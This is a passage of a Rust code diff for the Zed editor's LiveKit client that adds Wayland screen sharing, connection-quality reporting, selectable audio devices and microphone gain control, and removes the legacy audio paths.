+ config.tls_config = livekit::TlsConfig(Some(http_client_tls::tls_config())); let (room, mut events) = Tokio::spawn(cx, async move { livekit::Room::connect(&url, &token, config).await }) @@ -111,8 +109,8 @@ impl Room { user_name: String, is_staff: bool, cx: &mut AsyncApp, - ) -> Result<(LocalTrackPublication, playback::AudioStream)> { - let (track, stream) = self + ) -> Result<(LocalTrackPublication, playback::AudioStream, Arc)> { + let (track, stream, input_lag_us) = self 
.playback .capture_local_microphone_track(user_name, is_staff, &cx)?; let publication = self @@ -127,7 +125,7 @@ impl Room { ) .await?; - Ok((publication, stream)) + Ok((publication, stream, input_lag_us)) } pub async fn unpublish_local_track( @@ -143,25 +141,37 @@ impl Room { track: &RemoteAudioTrack, cx: &mut App, ) -> Result { - let speaker: Speaker = - serde_urlencoded::from_str(&track.0.name()).unwrap_or_else(|_| Speaker { - name: track.0.name(), - is_staff: false, - sends_legacy_audio: true, - }); - - if AudioSettings::get_global(cx).rodio_audio { - info!("Using experimental.rodio_audio audio pipeline for output"); - playback::play_remote_audio_track(&track.0, speaker, cx) - } else if speaker.sends_legacy_audio { - Ok(self.playback.play_remote_audio_track(&track.0)) - } else { - Err(anyhow!("Client version too old to play audio in call")) - } + let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone(); + Ok(self + .playback + .play_remote_audio_track(&track.0, output_audio_device)) + } + + pub async fn get_stats(&self) -> Result { + self.room.get_stats().await.map_err(anyhow::Error::from) + } + + /// Returns a `Task` that fetches room stats on the Tokio runtime. + /// + /// LiveKit's SDK is Tokio-based, so the stats fetch must run within + /// a Tokio context rather than on GPUI's smol-based background executor. 
+ pub fn stats_task(&self, cx: &impl gpui::AppContext) -> Task> { + let inner = self.room.clone(); + Tokio::spawn_result(cx, async move { + inner.get_stats().await.map_err(anyhow::Error::from) + }) } } impl LocalParticipant { + pub fn connection_quality(&self) -> ConnectionQuality { + connection_quality_from_livekit(self.0.connection_quality()) + } + + pub fn audio_level(&self) -> f32 { + self.0.audio_level() + } + pub async fn publish_screenshare_track( &self, source: &dyn ScreenCaptureSource, @@ -206,6 +216,33 @@ impl LocalParticipant { .map(LocalTrackPublication) .context("unpublishing a track") } + + #[cfg(target_os = "linux")] + pub async fn publish_screenshare_track_wayland( + &self, + cx: &mut AsyncApp, + ) -> Result<( + LocalTrackPublication, + Box, + futures::channel::oneshot::Receiver<()>, + )> { + let (track, stop_flag, feed_task, failure_rx) = + linux::start_wayland_desktop_capture(cx).await?; + let options = livekit::options::TrackPublishOptions { + source: livekit::track::TrackSource::Screenshare, + video_codec: livekit::options::VideoCodec::VP8, + ..Default::default() + }; + let publication = self + .publish_track(livekit::track::LocalTrack::Video(track.0), options, cx) + .await?; + + Ok(( + publication, + Box::new(linux::WaylandScreenCaptureStream::new(stop_flag, feed_task)), + failure_rx, + )) + } } impl LocalTrackPublication { @@ -235,6 +272,14 @@ impl LocalTrackPublication { } impl RemoteParticipant { + pub fn connection_quality(&self) -> ConnectionQuality { + connection_quality_from_livekit(self.0.connection_quality()) + } + + pub fn audio_level(&self) -> f32 { + self.0.audio_level() + } + pub fn identity(&self) -> ParticipantIdentity { ParticipantIdentity(self.0.identity().0) } @@ -298,6 +343,31 @@ impl Participant { } } } + + pub fn connection_quality(&self) -> ConnectionQuality { + match self { + Participant::Local(local_participant) => local_participant.connection_quality(), + Participant::Remote(remote_participant) => 
remote_participant.connection_quality(), + } + } + + pub fn audio_level(&self) -> f32 { + match self { + Participant::Local(local_participant) => local_participant.audio_level(), + Participant::Remote(remote_participant) => remote_participant.audio_level(), + } + } +} + +fn connection_quality_from_livekit( + quality: livekit::prelude::ConnectionQuality, +) -> ConnectionQuality { + match quality { + livekit::prelude::ConnectionQuality::Excellent => ConnectionQuality::Excellent, + livekit::prelude::ConnectionQuality::Good => ConnectionQuality::Good, + livekit::prelude::ConnectionQuality::Poor => ConnectionQuality::Poor, + livekit::prelude::ConnectionQuality::Lost => ConnectionQuality::Lost, + } } fn participant_from_livekit(participant: livekit::participant::Participant) -> Participant { @@ -475,6 +545,13 @@ fn room_event_from_livekit(event: livekit::RoomEvent) -> Option { }, livekit::RoomEvent::Reconnecting => RoomEvent::Reconnecting, livekit::RoomEvent::Reconnected => RoomEvent::Reconnected, + livekit::RoomEvent::ConnectionQualityChanged { + quality, + participant, + } => RoomEvent::ConnectionQualityChanged { + participant: participant_from_livekit(participant), + quality: connection_quality_from_livekit(quality), + }, _ => { log::trace!("dropping livekit event: {:?}", event); return None; diff --git a/crates/livekit_client/src/livekit_client/linux.rs b/crates/livekit_client/src/livekit_client/linux.rs new file mode 100644 index 0000000000000000000000000000000000000000..fe7189e901dc8586dbcbdfadbc7a8a0ef5fb1e5d --- /dev/null +++ b/crates/livekit_client/src/livekit_client/linux.rs @@ -0,0 +1,203 @@ +use anyhow::Result; +use futures::StreamExt as _; +use futures::channel::oneshot; +use gpui::{AsyncApp, ScreenCaptureStream}; +use livekit::track; +use livekit::webrtc::{ + prelude::NV12Buffer, + video_frame::{VideoFrame, VideoRotation}, + video_source::{RtcVideoSource, VideoResolution, native::NativeVideoSource}, +}; +use std::sync::{ + Arc, + atomic::{AtomicBool, 
AtomicU64, Ordering}, +}; + +static NEXT_WAYLAND_SHARE_ID: AtomicU64 = AtomicU64::new(1); +const PIPEWIRE_TIMEOUT_S: u64 = 30; + +pub struct WaylandScreenCaptureStream { + id: u64, + stop_flag: Arc, + _capture_task: gpui::Task<()>, +} + +impl WaylandScreenCaptureStream { + pub fn new(stop_flag: Arc, capture_task: gpui::Task<()>) -> Self { + Self { + id: NEXT_WAYLAND_SHARE_ID.fetch_add(1, Ordering::Relaxed), + stop_flag, + _capture_task: capture_task, + } + } +} + +impl ScreenCaptureStream for WaylandScreenCaptureStream { + fn metadata(&self) -> Result { + Ok(gpui::SourceMetadata { + id: self.id, + label: None, + is_main: None, + resolution: gpui::size(gpui::DevicePixels(1), gpui::DevicePixels(1)), + }) + } +} + +impl Drop for WaylandScreenCaptureStream { + fn drop(&mut self) { + self.stop_flag.store(true, Ordering::Release); + } +} + +pub(crate) async fn start_wayland_desktop_capture( + cx: &mut AsyncApp, +) -> Result<( + crate::LocalVideoTrack, + Arc, + gpui::Task<()>, + oneshot::Receiver<()>, +)> { + use futures::channel::mpsc; + use gpui::FutureExt as _; + use libwebrtc::desktop_capturer::{ + CaptureError, DesktopCaptureSourceType, DesktopCapturer, DesktopCapturerOptions, + DesktopFrame, + }; + use libwebrtc::native::yuv_helper::argb_to_nv12; + use std::time::Duration; + use webrtc_sys::webrtc::ffi as webrtc_ffi; + + fn webrtc_log_callback(message: String, severity: webrtc_ffi::LoggingSeverity) { + match severity { + webrtc_ffi::LoggingSeverity::Error => log::error!("[webrtc] {}", message.trim()), + _ => log::debug!("[webrtc] {}", message.trim()), + } + } + + let _webrtc_log_sink = webrtc_ffi::new_log_sink(webrtc_log_callback); + log::debug!("Wayland desktop capture: WebRTC internal logging enabled"); + + let stop_flag = Arc::new(AtomicBool::new(false)); + let (mut video_source_tx, mut video_source_rx) = mpsc::channel::(1); + let (failure_tx, failure_rx) = oneshot::channel::<()>(); + + let mut options = 
DesktopCapturerOptions::new(DesktopCaptureSourceType::Generic); + options.set_include_cursor(true); + let mut capturer = DesktopCapturer::new(options).ok_or_else(|| { + anyhow::anyhow!( + "Failed to create desktop capturer. \ + Check that xdg-desktop-portal is installed and running." + ) + })?; + + let permanent_error = Arc::new(AtomicBool::new(false)); + let stop_cb = stop_flag.clone(); + let permanent_error_cb = permanent_error.clone(); + capturer.start_capture(None, { + let mut video_source: Option = None; + let mut current_width: u32 = 0; + let mut current_height: u32 = 0; + let mut video_frame = VideoFrame { + rotation: VideoRotation::VideoRotation0, + buffer: NV12Buffer::new(1, 1), + timestamp_us: 0, + }; + + move |result: Result| { + let frame = match result { + Ok(frame) => frame, + Err(CaptureError::Temporary) => return, + Err(CaptureError::Permanent) => { + log::error!("Wayland desktop capture encountered a permanent error"); + permanent_error_cb.store(true, Ordering::Release); + stop_cb.store(true, Ordering::Release); + return; + } + }; + + let width = frame.width() as u32; + let height = frame.height() as u32; + if width != current_width || height != current_height { + current_width = width; + current_height = height; + video_frame.buffer = NV12Buffer::new(width, height); + } + + let (stride_y, stride_uv) = video_frame.buffer.strides(); + let (data_y, data_uv) = video_frame.buffer.data_mut(); + argb_to_nv12( + frame.data(), + frame.stride(), + data_y, + stride_y, + data_uv, + stride_uv, + width as i32, + height as i32, + ); + + if let Some(source) = &video_source { + source.capture_frame(&video_frame); + } else { + let source = NativeVideoSource::new(VideoResolution { width, height }, true); + source.capture_frame(&video_frame); + video_source_tx.try_send(source.clone()).ok(); + video_source = Some(source); + } + } + }); + + log::info!("Wayland desktop capture: starting capture loop"); + + let stop = stop_flag.clone(); + let tokio_task = 
gpui_tokio::Tokio::spawn(cx, async move { + loop { + if stop.load(Ordering::Acquire) { + break; + } + capturer.capture_frame(); + tokio::time::sleep(Duration::from_millis(33)).await; + } + drop(capturer); + + if permanent_error.load(Ordering::Acquire) { + log::error!("Wayland screen capture ended due to a permanent capture error"); + let _ = failure_tx.send(()); + } + }); + + let capture_task = cx.background_executor().spawn(async move { + if let Err(error) = tokio_task.await { + log::error!("Wayland capture task failed: {error}"); + } + }); + + let executor = cx.background_executor().clone(); + let video_source = video_source_rx + .next() + .with_timeout(Duration::from_secs(PIPEWIRE_TIMEOUT_S), &executor) + .await + .map_err(|_| { + stop_flag.store(true, Ordering::Relaxed); + log::error!("Wayland desktop capture timed out."); + anyhow::anyhow!( + "Screen sharing timed out waiting for the first frame. \ + Check that xdg-desktop-portal and PipeWire are running, \ + and that your portal backend matches your compositor." + ) + })? + .ok_or_else(|| { + stop_flag.store(true, Ordering::Relaxed); + anyhow::anyhow!( + "Screen sharing was canceled or the portal denied permission. \ + You can try again from the screen share button." 
+ ) + })?; + + let track = super::LocalVideoTrack(track::LocalVideoTrack::create_video_track( + "screen share", + RtcVideoSource::Native(video_source), + )); + + Ok((track, stop_flag, capture_task, failure_rx)) +} diff --git a/crates/livekit_client/src/livekit_client/playback.rs b/crates/livekit_client/src/livekit_client/playback.rs index 6e39c2abfb4162ceaa43373f4170a41ffdb36351..cea5b1169b0c1c0c6b699884e107cf24795f5d9c 100644 --- a/crates/livekit_client/src/livekit_client/playback.rs +++ b/crates/livekit_client/src/livekit_client/playback.rs @@ -1,8 +1,9 @@ use anyhow::{Context as _, Result}; -use audio::{AudioSettings, CHANNEL_COUNT, LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE, SAMPLE_RATE}; +use audio::{AudioSettings, CHANNEL_COUNT, SAMPLE_RATE}; +use cpal::DeviceId; use cpal::traits::{DeviceTrait, StreamTrait as _}; -use futures::channel::mpsc::UnboundedSender; +use futures::channel::mpsc::Sender; use futures::{Stream, StreamExt as _}; use gpui::{ AsyncApp, BackgroundExecutor, Priority, ScreenCaptureFrame, ScreenCaptureSource, @@ -22,16 +23,21 @@ use livekit::webrtc::{ use log::info; use parking_lot::Mutex; use rodio::Source; +use rodio::conversions::SampleTypeConverter; +use rodio::source::{AutomaticGainControlSettings, LimitSettings}; use serde::{Deserialize, Serialize}; use settings::Settings; use std::cell::RefCell; use std::sync::Weak; -use std::sync::atomic::{AtomicBool, AtomicI32, Ordering}; -use std::time::Duration; -use std::{borrow::Cow, collections::VecDeque, sync::Arc, thread}; +use std::sync::atomic::{AtomicI32, AtomicU64, Ordering}; +use std::time::{Duration, Instant}; +use std::{borrow::Cow, collections::VecDeque, sync::Arc}; use util::{ResultExt as _, maybe}; -mod source; +struct TimestampedFrame { + frame: AudioFrame<'static>, + captured_at: Instant, +} pub(crate) struct AudioStack { executor: BackgroundExecutor, @@ -41,38 +47,6 @@ pub(crate) struct AudioStack { next_ssrc: AtomicI32, } -pub(crate) fn play_remote_audio_track( - track: 
&livekit::track::RemoteAudioTrack, - speaker: Speaker, - cx: &mut gpui::App, -) -> Result { - info!("speaker: {speaker:?}"); - let stream = - source::LiveKitStream::new(cx.background_executor(), track, speaker.sends_legacy_audio); - - let stop_handle = Arc::new(AtomicBool::new(false)); - let stop_handle_clone = stop_handle.clone(); - let stream = stream - .stoppable() - .periodic_access(Duration::from_millis(50), move |s| { - if stop_handle.load(Ordering::Relaxed) { - s.stop(); - } - }); - - info!("sample_rate: {:?}", stream.sample_rate()); - info!("channel_count: {:?}", stream.channels()); - audio::Audio::play_voip_stream(stream, speaker.name, speaker.is_staff, cx) - .context("Could not play audio")?; - - let on_drop = util::defer(move || { - stop_handle_clone.store(true, Ordering::Relaxed); - }); - Ok(AudioStream::Output { - _drop: Box::new(on_drop), - }) -} - impl AudioStack { pub(crate) fn new(executor: BackgroundExecutor) -> Self { let apm = Arc::new(Mutex::new(apm::AudioProcessingModule::new( @@ -91,14 +65,15 @@ impl AudioStack { pub(crate) fn play_remote_audio_track( &self, track: &livekit::track::RemoteAudioTrack, + output_audio_device: Option, ) -> AudioStream { - let output_task = self.start_output(); + let output_task = self.start_output(output_audio_device); let next_ssrc = self.next_ssrc.fetch_add(1, Ordering::Relaxed); let source = AudioMixerSource { ssrc: next_ssrc, - sample_rate: LEGACY_SAMPLE_RATE.get(), - num_channels: LEGACY_CHANNEL_COUNT.get() as u32, + sample_rate: SAMPLE_RATE.get(), + num_channels: CHANNEL_COUNT.get() as u32, buffer: Arc::default(), }; self.mixer.lock().add_source(source.clone()); @@ -109,7 +84,7 @@ impl AudioStack { source.num_channels as i32, ); - let receive_task = self.executor.spawn({ + let receive_task = self.executor.spawn_with_priority(Priority::RealtimeAudio, { let source = source.clone(); async move { while let Some(frame) = stream.next().await { @@ -130,19 +105,22 @@ impl AudioStack { } } - fn start_output(&self) -> 
Arc> { + fn start_output(&self, output_audio_device: Option) -> Arc> { if let Some(task) = self._output_task.borrow().upgrade() { return task; } let task = Arc::new(self.executor.spawn({ let apm = self.apm.clone(); let mixer = self.mixer.clone(); + let executor = self.executor.clone(); async move { Self::play_output( + executor, apm, mixer, - LEGACY_SAMPLE_RATE.get(), - LEGACY_CHANNEL_COUNT.get().into(), + SAMPLE_RATE.get(), + CHANNEL_COUNT.get().into(), + output_audio_device, ) .await .log_err(); @@ -157,33 +135,18 @@ impl AudioStack { user_name: String, is_staff: bool, cx: &AsyncApp, - ) -> Result<(crate::LocalAudioTrack, AudioStream)> { - let legacy_audio_compatible = - AudioSettings::try_read_global(cx, |setting| setting.legacy_audio_compatible) - .unwrap_or(true); - - let source = if legacy_audio_compatible { - NativeAudioSource::new( - // n.b. this struct's options are always ignored, noise cancellation is provided by apm. - AudioSourceOptions::default(), - LEGACY_SAMPLE_RATE.get(), - LEGACY_CHANNEL_COUNT.get().into(), - 10, - ) - } else { - NativeAudioSource::new( - // n.b. this struct's options are always ignored, noise cancellation is provided by apm. - AudioSourceOptions::default(), - SAMPLE_RATE.get(), - CHANNEL_COUNT.get().into(), - 10, - ) - }; + ) -> Result<(crate::LocalAudioTrack, AudioStream, Arc)> { + let source = NativeAudioSource::new( + // n.b. this struct's options are always ignored, noise cancellation is provided by apm. 
+ AudioSourceOptions::default(), + SAMPLE_RATE.get(), + CHANNEL_COUNT.get().into(), + 10, + ); let speaker = Speaker { name: user_name, is_staff, - sends_legacy_audio: legacy_audio_compatible, }; log::info!("Microphone speaker: {speaker:?}"); let track_name = serde_urlencoded::to_string(speaker) @@ -196,35 +159,31 @@ impl AudioStack { let apm = self.apm.clone(); - let (frame_tx, mut frame_rx) = futures::channel::mpsc::unbounded(); - let transmit_task = self.executor.spawn({ + let input_lag_us = Arc::new(AtomicU64::new(0)); + let (frame_tx, mut frame_rx) = futures::channel::mpsc::channel::(1); + let transmit_task = self.executor.spawn_with_priority(Priority::RealtimeAudio, { + let input_lag_us = input_lag_us.clone(); async move { - while let Some(frame) = frame_rx.next().await { - source.capture_frame(&frame).await.log_err(); + while let Some(timestamped) = frame_rx.next().await { + let lag = timestamped.captured_at.elapsed(); + input_lag_us.store(lag.as_micros() as u64, Ordering::Relaxed); + source.capture_frame(×tamped.frame).await.log_err(); } } }); - let rodio_pipeline = - AudioSettings::try_read_global(cx, |setting| setting.rodio_audio).unwrap_or_default(); - let capture_task = if rodio_pipeline { - info!("Using experimental.rodio_audio audio pipeline"); - let voip_parts = audio::VoipParts::new(cx)?; - // Audio needs to run real-time and should never be paused. 
That is - // why we are using a normal std::thread and not a background task - self.executor - .spawn_with_priority(Priority::RealtimeAudio, async move { - // microphone is non send on mac - let microphone = audio::Audio::open_microphone(voip_parts)?; - send_to_livekit(frame_tx, microphone); - Ok(()) - }) - } else { + let capture_task = { + let input_audio_device = + AudioSettings::try_read_global(cx, |settings| settings.input_audio_device.clone()) + .flatten(); + let executor = self.executor.clone(); self.executor.spawn(async move { Self::capture_input( + executor, apm, frame_tx, - LEGACY_SAMPLE_RATE.get(), - LEGACY_CHANNEL_COUNT.get().into(), + SAMPLE_RATE.get(), // TODO(audio): was legacy removed for now + CHANNEL_COUNT.get().into(), + input_audio_device, ) .await }) @@ -239,14 +198,17 @@ impl AudioStack { AudioStream::Output { _drop: Box::new(on_drop), }, + input_lag_us, )) } async fn play_output( + executor: BackgroundExecutor, apm: Arc>, mixer: Arc>, sample_rate: u32, - num_channels: u32, + _num_channels: u32, + output_audio_device: Option, ) -> Result<()> { // Prevent App Nap from throttling audio playback on macOS. // This guard is held for the entire duration of audio output. 
@@ -255,16 +217,17 @@ impl AudioStack { loop { let mut device_change_listener = DeviceChangeListener::new(false)?; - let (output_device, output_config) = crate::default_device(false)?; + let (output_device, output_config) = + crate::default_device(false, output_audio_device.as_ref())?; + info!("Output config: {output_config:?}"); let (end_on_drop_tx, end_on_drop_rx) = std::sync::mpsc::channel::<()>(); let mixer = mixer.clone(); let apm = apm.clone(); let mut resampler = audio_resampler::AudioResampler::default(); let mut buf = Vec::new(); - thread::Builder::new() - .name("AudioPlayback".to_owned()) - .spawn(move || { + executor + .spawn_with_priority(Priority::RealtimeAudio, async move { let output_stream = output_device.build_output_stream( &output_config.config(), { @@ -287,7 +250,12 @@ impl AudioStack { let sampled = resampler.remix_and_resample( mixed, sample_rate / 100, - num_channels, + // We need to assume output number of channels as otherwise we will + // crash in process_reverse_stream otherwise as livekit's audio resampler + // does not seem to support non-matching channel counts. + // NOTE: you can verify this by debug printing buf.len() after this stage. + // For 2->4 channel upmix, we should see buf.len=1920, buf we get only 960. 
+ output_config.channels() as u32, sample_rate, output_config.channels() as u32, output_config.sample_rate(), @@ -315,7 +283,7 @@ impl AudioStack { // Block forever to keep the output stream alive end_on_drop_rx.recv().ok(); }) - .unwrap(); + .detach(); device_change_listener.next().await; drop(end_on_drop_tx) @@ -323,22 +291,23 @@ impl AudioStack { } async fn capture_input( + executor: BackgroundExecutor, apm: Arc>, - frame_tx: UnboundedSender>, + frame_tx: Sender, sample_rate: u32, num_channels: u32, + input_audio_device: Option, ) -> Result<()> { loop { let mut device_change_listener = DeviceChangeListener::new(true)?; - let (device, config) = crate::default_device(true)?; + let (device, config) = crate::default_device(true, input_audio_device.as_ref())?; let (end_on_drop_tx, end_on_drop_rx) = std::sync::mpsc::channel::<()>(); let apm = apm.clone(); - let frame_tx = frame_tx.clone(); + let mut frame_tx = frame_tx.clone(); let mut resampler = audio_resampler::AudioResampler::default(); - thread::Builder::new() - .name("AudioCapture".to_owned()) - .spawn(move || { + executor + .spawn_with_priority(Priority::RealtimeAudio, async move { maybe!({ if let Some(desc) = device.description().ok() { log::info!("Using microphone: {}", desc.name()) @@ -349,12 +318,21 @@ impl AudioStack { let ten_ms_buffer_size = (config.channels() as u32 * config.sample_rate() / 100) as usize; let mut buf: Vec = Vec::with_capacity(ten_ms_buffer_size); + let mut rodio_effects = RodioEffectsAdaptor::new(buf.len()) + .automatic_gain_control(AutomaticGainControlSettings { + target_level: 0.50, + attack_time: Duration::from_secs(1), + release_time: Duration::from_secs(0), + absolute_max_gain: 5.0, + }) + .limit(LimitSettings::live_performance()); let stream = device .build_input_stream_raw( &config.config(), config.sample_format(), move |data, _: &_| { + let captured_at = Instant::now(); let data = crate::get_sample_data(config.sample_format(), data) .log_err(); let Some(data) = data else { @@ 
-379,6 +357,21 @@ impl AudioStack { sample_rate, ) .to_owned(); + + if audio::LIVE_SETTINGS + .auto_microphone_volume + .load(Ordering::Relaxed) + { + rodio_effects + .inner_mut() + .inner_mut() + .fill_buffer_with(&sampled); + sampled.clear(); + sampled.extend(SampleTypeConverter::<_, i16>::new( + rodio_effects.by_ref(), + )); + } + apm.lock() .process_stream( &mut sampled, @@ -387,12 +380,16 @@ impl AudioStack { ) .log_err(); buf.clear(); + frame_tx - .unbounded_send(AudioFrame { - data: Cow::Owned(sampled), - sample_rate, - num_channels, - samples_per_channel: sample_rate / 100, + .try_send(TimestampedFrame { + frame: AudioFrame { + data: Cow::Owned(sampled), + sample_rate, + num_channels, + samples_per_channel: sample_rate / 100, + }, + captured_at, }) .ok(); } @@ -410,7 +407,7 @@ impl AudioStack { }) .log_err(); }) - .unwrap(); + .detach(); device_change_listener.next().await; drop(end_on_drop_tx) @@ -418,39 +415,73 @@ impl AudioStack { } } -#[derive(Serialize, Deserialize, Debug)] -pub struct Speaker { - pub name: String, - pub is_staff: bool, - pub sends_legacy_audio: bool, +/// This allows using of Rodio's effects library within our home brewn audio +/// pipeline. The alternative would be inlining Rodio's effects which is +/// problematic from a legal stance. We would then have to make clear that code +/// is not owned by zed-industries while the code would be surrounded by +/// zed-industries owned code. +/// +/// This adaptor does incur a slight performance penalty (copying into a +/// pre-allocated vec and back) however the impact will be immeasurably low. +/// +/// There is no latency impact. 
+pub struct RodioEffectsAdaptor { + input: Vec, + pos: usize, } -fn send_to_livekit(frame_tx: UnboundedSender>, mut microphone: impl Source) { - use cpal::Sample; - let sample_rate = microphone.sample_rate().get(); - let num_channels = microphone.channels().get() as u32; - let buffer_size = sample_rate / 100 * num_channels; - - loop { - let sampled: Vec<_> = microphone - .by_ref() - .take(buffer_size as usize) - .map(|s| s.to_sample()) - .collect(); - - if frame_tx - .unbounded_send(AudioFrame { - sample_rate, - num_channels, - samples_per_channel: sampled.len() as u32 / num_channels, - data: Cow::Owned(sampled), - }) - .is_err() - { - // must rx has dropped or is not consuming - break; +impl RodioEffectsAdaptor { + // This implementation incorrect terminology confusing everyone. A normal + // audio frame consists of all samples for one moment in time (one for mono, + // two for stereo). Here a frame of audio refers to a 10ms buffer of samples. + fn new(samples_per_frame: usize) -> Self { + Self { + input: Vec::with_capacity(samples_per_frame), + pos: 0, } } + + fn fill_buffer_with(&mut self, integer_samples: &[i16]) { + self.input.clear(); + self.input.extend(SampleTypeConverter::<_, f32>::new( + integer_samples.iter().copied(), + )); + self.pos = 0; + } +} + +impl Iterator for RodioEffectsAdaptor { + type Item = rodio::Sample; + + fn next(&mut self) -> Option { + let sample = self.input.get(self.pos)?; + self.pos += 1; + Some(*sample) + } +} + +impl rodio::Source for RodioEffectsAdaptor { + fn current_span_len(&self) -> Option { + None + } + + fn channels(&self) -> rodio::ChannelCount { + rodio::nz!(2) + } + + fn sample_rate(&self) -> rodio::SampleRate { + rodio::nz!(48000) + } + + fn total_duration(&self) -> Option { + None + } +} + +#[derive(Serialize, Deserialize, Debug)] +pub struct Speaker { + pub name: String, + pub is_staff: bool, } use super::LocalVideoTrack; @@ -466,10 +497,13 @@ pub(crate) async fn capture_local_video_track( ) -> 
Result<(crate::LocalVideoTrack, Box)> { let metadata = capture_source.metadata()?; let track_source = gpui_tokio::Tokio::spawn(cx, async move { - NativeVideoSource::new(VideoResolution { - width: metadata.resolution.width.0 as u32, - height: metadata.resolution.height.0 as u32, - }) + NativeVideoSource::new( + VideoResolution { + width: metadata.resolution.width.0 as u32, + height: metadata.resolution.height.0 as u32, + }, + true, + ) }) .await?; diff --git a/crates/livekit_client/src/livekit_client/playback/source.rs b/crates/livekit_client/src/livekit_client/playback/source.rs deleted file mode 100644 index b90c3613f8215481a4a535eb81c665fccae80e5c..0000000000000000000000000000000000000000 --- a/crates/livekit_client/src/livekit_client/playback/source.rs +++ /dev/null @@ -1,92 +0,0 @@ -use std::num::NonZero; - -use futures::StreamExt; -use libwebrtc::{audio_stream::native::NativeAudioStream, prelude::AudioFrame}; -use livekit::track::RemoteAudioTrack; -use rodio::{ - ChannelCount, SampleRate, Source, buffer::SamplesBuffer, conversions::SampleTypeConverter, -}; - -use audio::{CHANNEL_COUNT, LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE, SAMPLE_RATE}; - -fn frame_to_samplesbuffer(frame: AudioFrame) -> SamplesBuffer { - let samples = frame.data.iter().copied(); - let samples = SampleTypeConverter::<_, _>::new(samples); - let samples: Vec = samples.collect(); - SamplesBuffer::new( - NonZero::new(frame.num_channels as u16).expect("zero channels is nonsense"), - NonZero::new(frame.sample_rate).expect("samplerate zero is nonsense"), - samples, - ) -} - -pub struct LiveKitStream { - // shared_buffer: SharedBuffer, - inner: rodio::queue::SourcesQueueOutput, - _receiver_task: gpui::Task<()>, - channel_count: ChannelCount, - sample_rate: SampleRate, -} - -impl LiveKitStream { - pub fn new( - executor: &gpui::BackgroundExecutor, - track: &RemoteAudioTrack, - legacy: bool, - ) -> Self { - let (channel_count, sample_rate) = if legacy { - (LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE) - 
} else { - (CHANNEL_COUNT, SAMPLE_RATE) - }; - - let mut stream = NativeAudioStream::new( - track.rtc_track(), - sample_rate.get() as i32, - channel_count.get().into(), - ); - let (queue_input, queue_output) = rodio::queue::queue(true); - // spawn rtc stream - let receiver_task = executor.spawn_with_priority(gpui::Priority::RealtimeAudio, { - async move { - while let Some(frame) = stream.next().await { - let samples = frame_to_samplesbuffer(frame); - queue_input.append(samples); - } - } - }); - - LiveKitStream { - _receiver_task: receiver_task, - inner: queue_output, - sample_rate, - channel_count, - } - } -} - -impl Iterator for LiveKitStream { - type Item = rodio::Sample; - - fn next(&mut self) -> Option { - self.inner.next() - } -} - -impl Source for LiveKitStream { - fn current_span_len(&self) -> Option { - self.inner.current_span_len() - } - - fn channels(&self) -> rodio::ChannelCount { - self.channel_count - } - - fn sample_rate(&self) -> rodio::SampleRate { - self.sample_rate - } - - fn total_duration(&self) -> Option { - self.inner.total_duration() - } -} diff --git a/crates/livekit_client/src/mock_client.rs b/crates/livekit_client/src/mock_client.rs index 4c19cb4d57695f86b98c299646a376edb64414b7..d1cd399d256d6b826de349d9fe533f45990c5f04 100644 --- a/crates/livekit_client/src/mock_client.rs +++ b/crates/livekit_client/src/mock_client.rs @@ -15,7 +15,7 @@ pub type LocalTrackPublication = publication::LocalTrackPublication; pub type LocalParticipant = participant::LocalParticipant; pub type Room = test::Room; -pub use test::{ConnectionState, ParticipantIdentity, TrackSid}; +pub use test::{ConnectionState, ParticipantIdentity, RtcStats, SessionStats, TrackSid}; pub struct AudioStream {} diff --git a/crates/livekit_client/src/mock_client/participant.rs b/crates/livekit_client/src/mock_client/participant.rs index 033808cbb54189fa2a7841264097751da4deb027..d3f720c5d8a07a99459943078aeaafbdfabec79f 100644 --- a/crates/livekit_client/src/mock_client/participant.rs 
+++ b/crates/livekit_client/src/mock_client/participant.rs @@ -1,6 +1,6 @@ use crate::{ - AudioStream, LocalAudioTrack, LocalTrackPublication, LocalVideoTrack, Participant, - ParticipantIdentity, RemoteTrack, RemoteTrackPublication, TrackSid, + AudioStream, ConnectionQuality, LocalAudioTrack, LocalTrackPublication, LocalVideoTrack, + Participant, ParticipantIdentity, RemoteTrack, RemoteTrackPublication, TrackSid, test::{Room, WeakRoom}, }; use anyhow::Result; @@ -8,6 +8,7 @@ use collections::HashMap; use gpui::{ AsyncApp, DevicePixels, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, size, }; +use std::sync::{Arc, atomic::AtomicU64}; #[derive(Clone, Debug)] pub struct LocalParticipant { @@ -28,9 +29,31 @@ impl Participant { Participant::Remote(participant) => participant.identity.clone(), } } + + pub fn connection_quality(&self) -> ConnectionQuality { + match self { + Participant::Local(p) => p.connection_quality(), + Participant::Remote(p) => p.connection_quality(), + } + } + + pub fn audio_level(&self) -> f32 { + match self { + Participant::Local(p) => p.audio_level(), + Participant::Remote(p) => p.audio_level(), + } + } } impl LocalParticipant { + pub fn connection_quality(&self) -> ConnectionQuality { + ConnectionQuality::Excellent + } + + pub fn audio_level(&self) -> f32 { + 0.0 + } + pub async fn unpublish_track(&self, track: TrackSid, _cx: &AsyncApp) -> Result<()> { self.room .test_server() @@ -41,7 +64,7 @@ impl LocalParticipant { pub(crate) async fn publish_microphone_track( &self, _cx: &AsyncApp, - ) -> Result<(LocalTrackPublication, AudioStream)> { + ) -> Result<(LocalTrackPublication, AudioStream, Arc)> { let this = self.clone(); let server = this.room.test_server(); let sid = server @@ -54,6 +77,7 @@ impl LocalParticipant { sid, }, AudioStream {}, + Arc::new(AtomicU64::new(0)), )) } @@ -75,9 +99,42 @@ impl LocalParticipant { Box::new(TestScreenCaptureStream {}), )) } + + #[cfg(target_os = "linux")] + pub async fn 
